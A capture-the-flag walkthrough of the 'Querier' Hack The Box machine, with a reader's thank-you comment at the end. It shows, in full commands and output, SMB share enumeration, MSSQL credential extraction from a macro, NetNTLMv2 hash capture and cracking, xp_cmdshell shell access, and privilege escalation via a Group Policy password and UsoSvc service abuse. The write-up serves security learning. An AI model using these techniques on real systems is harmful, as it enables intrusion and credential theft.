Querier write-up by Alamot

Enumeration

Port scanning

Let’s scan the full range of TCP and UDP ports using my tool htbscan.py (you can find it here: code-snippets/htbscan.py at master · Alamot/code-snippets · GitHub)

$ sudo htbscan.py 10.10.10.125 -o querier_enum.txt

Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-06-21 16:06:53 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 49671/tcp on 10.10.10.125                                 
Discovered open port 49666/tcp on 10.10.10.125                                 
Discovered open port 135/tcp on 10.10.10.125                                   
Discovered open port 49668/tcp on 10.10.10.125                                 
Discovered open port 139/tcp on 10.10.10.125                                   
Discovered open port 1433/tcp on 10.10.10.125                                  
Discovered open port 49670/tcp on 10.10.10.125                                 
Discovered open port 47001/tcp on 10.10.10.125                                 
Discovered open port 49664/tcp on 10.10.10.125                                 
Discovered open port 49669/tcp on 10.10.10.125                                 
Discovered open port 445/tcp on 10.10.10.125                                   
Discovered open port 49665/tcp on 10.10.10.125                                 
Discovered open port 5985/tcp on 10.10.10.125                                  
Discovered open port 49667/tcp on 10.10.10.125                                 
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-21 19:17 EEST
Nmap scan report for QUERIER (10.10.10.125)
Host is up (0.065s latency).

PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
1433/tcp  open  ms-sql-s      Microsoft SQL Server  14.00.1000.00
| ms-sql-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: QUERIER
|   DNS_Domain_Name: HTB.LOCAL
|   DNS_Computer_Name: QUERIER.HTB.LOCAL
|   DNS_Tree_Name: HTB.LOCAL
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2019-06-21T15:32:31
|_Not valid after:  2049-06-21T15:32:31
|_ssl-date: 2019-06-21T16:18:33+00:00; +5s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (92%), Microsoft Windows Server 2016 (92%), Microsoft Windows Vista SP1 (92%), Microsoft Windows Longhorn (91%), Microsoft Windows Server 2012 R2 (90%), Microsoft Windows Server 2012 R2 Update 1 (90%), Microsoft Windows Server 2016 build 10586 - 14393 (90%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (90%), Microsoft Windows 10 1511 (90%), Microsoft Windows 10 1703 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4s, deviation: 0s, median: 4s
| ms-sql-info: 
|   10.10.10.125:1433: 
|     Version: 
|       name: Microsoft SQL Server 
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 
|_    TCP port: 1433
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-06-21 19:18:34
|_  start_date: N/A

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   64.45 ms 10.10.12.1
2   64.12 ms QUERIER (10.10.10.125)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.45 seconds

Discovering shares

Let’s enum shares:

$ smbmap.py -H 10.10.10.125 
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.125...
[+] IP: 10.10.10.125:445  Name: QUERIER                                           
  Disk                                            Permissions
  ----                                            -----------
[!] Access Denied

Hmmmm… Let’s try a dummy username:

$ smbmap.py -H 10.10.10.125 -u 'type_whatever_you_want_here'
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.125...
[+] IP: 10.10.10.125:445  Name: QUERIER                                           
  Disk                                                Permissions
  ----                                                -----------
  ADMIN$                                              NO ACCESS
  C$                                                  NO ACCESS
  IPC$                                                READ ONLY
  Reports                                             READ ONLY

Surprise, surprise. It works (stupid SMB protocol :P). Let’s use Impacket’s smbclient.py to examine the ‘Reports’ share:

$ smbclient.py -no-pass QUERIER/username_does_not_matter@10.10.10.125
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

Type help for list of commands
# shares
ADMIN$
C$
IPC$
Reports
# use Reports
# ls
drw-rw-rw-          0  Tue Jan 29 01:26:31 2019 .
drw-rw-rw-          0  Tue Jan 29 01:26:31 2019 ..
-rw-rw-rw-      12229  Tue Jan 29 01:26:31 2019 Currency Volume Report.xlsm
# get Currency Volume Report.xlsm
# exit

We can open this xlsm file using -for example- LibreOffice. If we examine the macros (Tools → Macros → Edit Macros) we discover some MSSQL credentials:

...
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
...

In case you didn’t know it, xlsm, xlsx, docx et.c. are just zip archives. Therefore, we can decompress them:

$ unzip Currency\ Volume\ Report.xlsm 
Archive:  Currency Volume Report.xlsm
  inflating: [Content_Types].xml     
  inflating: _rels/.rels             
  inflating: xl/workbook.xml         
  inflating: xl/_rels/workbook.xml.rels  
  inflating: xl/worksheets/sheet1.xml  
  inflating: xl/theme/theme1.xml     
  inflating: xl/styles.xml           
  inflating: xl/vbaProject.bin       
  inflating: docProps/core.xml       
  inflating: docProps/app.xml

$ strings xl/vbaProject.bin
...
Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6
...

Let’s try to connect to the MS SQL server using Impacket’s msssqlclient.py:

$ mssqlclient.py -windows-auth QUERIER/reporting:'PcwTWTHRwryjc$c6'@10.10.10.125
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: volume
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands
SQL>

Neat! Now, let’s try to execute a command using the ‘xp_cmdshell’ procedure:

SQL> EXEC xp_cmdshell "whoami"
[-] ERROR(QUERIER): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.

Hmmm, well that didn’t work. Let’s try to activate ‘xp_cmdshell’:

SQL> EXEC sp_configure 'show advanced options',1;RECONFIGURE;exec SP_CONFIGURE 'xp_cmdshell',1;RECONFIGURE;
[-] ERROR(QUERIER): Line 105: User does not have permission to perform this action.
[-] ERROR(QUERIER): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(QUERIER): Line 105: User does not have permission to perform this action.
[-] ERROR(QUERIER): Line 1: You do not have permission to run the RECONFIGURE statement.
SQL> 

Nope. Apparently the user ‘reporting’ doesn’t have the required privileges/permissions.

Capturing credentials

Well, we can try -using our ‘reporting’ account- to capture some other credentials… We will use Impacket’s smbserver.py to listen for incoming SMB connections:

$ sudo smbserver.py -smb2support myshare /tmp
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Now, we can use msdat tool (GitHub - quentinhardy/msdat: MSDAT: Microsoft SQL Database Attacking Tool) to send some traffic towards our SMB server:

$ msdat smbauthcapture -v -s 10.10.10.125 -p 1433 -D QUERIER -U reporting -P 'PcwTWTHRwryjc$c6' --capture 10.10.15.16

[1] (10.10.10.125:1433): Try to capture a SMB authentication with the xp_dirtree, xp_fileexist or xp_getfiledetails method
00:51:22 INFO -: Test all methods allowing to capture a SMB authentication...
00:51:22 INFO -: Capturing SMB Authentication via XP_DIRTREE...
00:51:23 INFO -: No error during the running: you could capture the SMB authentication
[+] You can perhaps capture a SMB authentication with these methods. Check your SMB capture tool !

Let’s see what we received in our SMB server:

[*] Incoming connection (10.10.10.125,49741)
[*] AUTHENTICATE_MESSAGE (QUERIER\mssql-svc,QUERIER)
[*] User mssql-svc\QUERIER authenticated successfully
[*] mssql-svc::QUERIER:4141414141414141:790d1a20ff18cdb330b3b6e43bca6988:010100000000000000e901777b28d50126ad6b81542b18860000000001001000780051004d005a004a006f004f00730002001000780048004f00540045006b006300610003001000780051004d005a004a006f004f00730004001000780048004f00540045006b00630061000700080000e901777b28d50106000400020000000800300030000000000000000000000000300000590946bc19d0765a150c1c561e8ea40b9f0627e137bb3b8950ad8952e5b6f3930a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310035002e0031003600000000000000000000000000
[*] Connecting Share(1:IPC$)
[-] SMB2_TREE_CONNECT not found S
[-] SMB2_TREE_CONNECT not found S
[*] AUTHENTICATE_MESSAGE (\,QUERIER)
[*] User \QUERIER authenticated successfully
[*] :::00::4141414141414141
[*] Disconnecting Share(1:IPC$)
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (10.10.10.125,49741)
[*] Remaining connections []

Let’s try to crack/reverse this hash using hashcat:

$ hashcat -h  | grep -i NetNTLMv2
   5600 | NetNTLMv2                                        | Network Protocols

$ hashcat -m 5600 mssql-svc::QUERIER:4141414141414141:790d1a20ff18cdb330b3b6e43bca6988:010100000000000000e901777b28d50126ad6b81542b18860000000001001000780051004d005a004a006f004f00730002001000780048004f00540045006b006300610003001000780051004d005a004a006f004f00730004001000780048004f00540045006b00630061000700080000e901777b28d50106000400020000000800300030000000000000000000000000300000590946bc19d0765a150c1c561e8ea40b9f0627e137bb3b8950ad8952e5b6f3930a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310035002e0031003600000000000000000000000000 /usr/share/dict/rockyou.txt

...

corporate568

Getting (mssql) shell as mssql-svc

It’s high time to get a shell. We can use a tool I wrote (MSSQL shell with file upload capability - The Portal of Knowledge). First, we have to edit some settings inside the script:

...
MSSQL_SERVER="10.10.10.125"
MSSQL_USERNAME = "QUERIER\\mssql-svc"
MSSQL_PASSWORD = "corporate568"
...

Now, let’s run it:

$ python mssql_shell.py 
Successful login: QUERIER\mssql-svc@10.10.10.125
Trying to enable xp_cmdshell ...
CMD mssql-svc@QUERIER C:\Windows\system32> whoami
querier\mssql-svc
CMD mssql-svc@QUERIER C:\Windows\system32> type C:\Users\mssql-svc\Desktop\user.txt
c*****************************6

Privilege escalation

Let’s upload PowerUp.ps1 (PowerSploit/PowerUp.ps1 at master · PowerShellMafia/PowerSploit · GitHub):

CMD mssql-svc@QUERIER C:\Windows\system32> cd C:\Users\Public
CMD mssql-svc@QUERIER C:\Users\Public> UPLOAD PowerUp.ps1 C:\Users\Public\PowerUp.ps1
Uploading PowerUp.ps1 to C:\Users\Public\PowerUp.ps1
Data length (b64-encoded): 732KB
100%|██████████| 735/735 [00:50<00:00, 16.63KB/s]
Input Length = 750897
Output Length = 562841
CertUtil: -decode command completed successfully.
MD5 hashes match: 711ca55ca8d9ba4f776ce052417fd98f
*** UPLOAD PROCEDURE FINISHED *** 
CMD mssql-svc@QUERIER C:\Users\Public>

Now, let’s run PowerUp.ps1:

CMD mssql-svc@QUERIER C:\Users\Public> powershell -command "& { . .\PowerUp.ps1; Invoke-AllChecks | Out-File -Encoding ASCII powerup_output.txt }"
CMD mssql-svc@QUERIER C:\Users\Public> type powerup_output.txt
...
[*] Checking service permissions...
ServiceName   : UsoSvc
Path          : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart    : True
...
[*] Checking %PATH% for potentially hijackable DLL locations...
ModifiablePath    : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
IdentityReference : QUERIER\mssql-svc
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'
...
[*] Checking for unattended install files...
UnattendPath : C:\Windows\Panther\Unattend.xml
...
[*] Checking for cached Group Policy Preferences .xml files....
None
None
Changed   : {2019-01-28 23:12:48}
UserNames : {Administrator}
NewName   : [BLANK]
Passwords : {MyUnclesAreMarioAndLuigi!!1!}
File      : C:\ProgramData\Microsoft\Group 
            Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
...

Using the Group Policy password and psexec.py

We can use Impacket’s psexec.py to get nt system/authority:

$ psexec.py QUERIER/Administrator:'MyUnclesAreMarioAndLuigi!!1!'@10.10.10.125

Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.125.....
[*] Found writable share ADMIN$
[*] Uploading file UNLjBysl.exe
[*] Opening SVCManager on 10.10.10.125.....
[*] Creating service bhCD on 10.10.10.125.....
[*] Starting service bhCD.....

[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>cd /users/administrator/desktop

C:\Users\Administrator\Desktop>type root.txt
b******************************2

Hooray! :smiley:

(Ab)Using UsoSvc service

Let’s examine the “UsoSvc” service:

CMD mssql-svc@QUERIER C:\Users\Public> sc qc "UsoSvc"
[SC] QueryServiceConfig SUCCESS
None
SERVICE_NAME: UsoSvc
        TYPE               : 20  WIN32_SHARE_PROCESS 
        START_TYPE         : 2   AUTO_START  (DELAYED)
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k netsvcs -p
        LOAD_ORDER_GROUP   : 
        TAG                : 0
        DISPLAY_NAME       : Update Orchestrator Service
        DEPENDENCIES       : rpcss
        SERVICE_START_NAME : LocalSystem

Let’s exploit it:

CMD mssql-svc@QUERIER C:\Users\Public> powershell -command "& { . .\PowerUp.ps1; Invoke-ServiceAbuse -ServiceName UsoSvc | Out-File -Encoding ASCII output.txt }"
CMD mssql-svc@QUERIER C:\Users\Public> type output.txt

ServiceAbused Command                                                                   
------------- -------                                                                   
UsoSvc        net user john Password123! /add && net localgroup Administrators john /add

Let’s see if our exploitation was successful:

CMD mssql-svc@QUERIER C:\Users\Public> net user
User accounts for \\QUERIER
-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest                    
john                     mssql-svc                reporting                
WDAGUtilityAccount       
The command completed successfully.

We could do also things like that et.c.:

$ sc config UsoSvc binPath="cmd /c type C:\Users\Administrator\Desktop\root.txt > C:\a.txt"

That’s all folks! :slight_smile:

Nice write up.Great thing is that i learn a lot more from your scripts.
I really want to get better at scripting.So your write up is super helpful to me.Thanks Thanks and thanks .
I think its really a long time since you have published any recent write up.Please keep these coming as these are life saver to me personally.
Thanks again.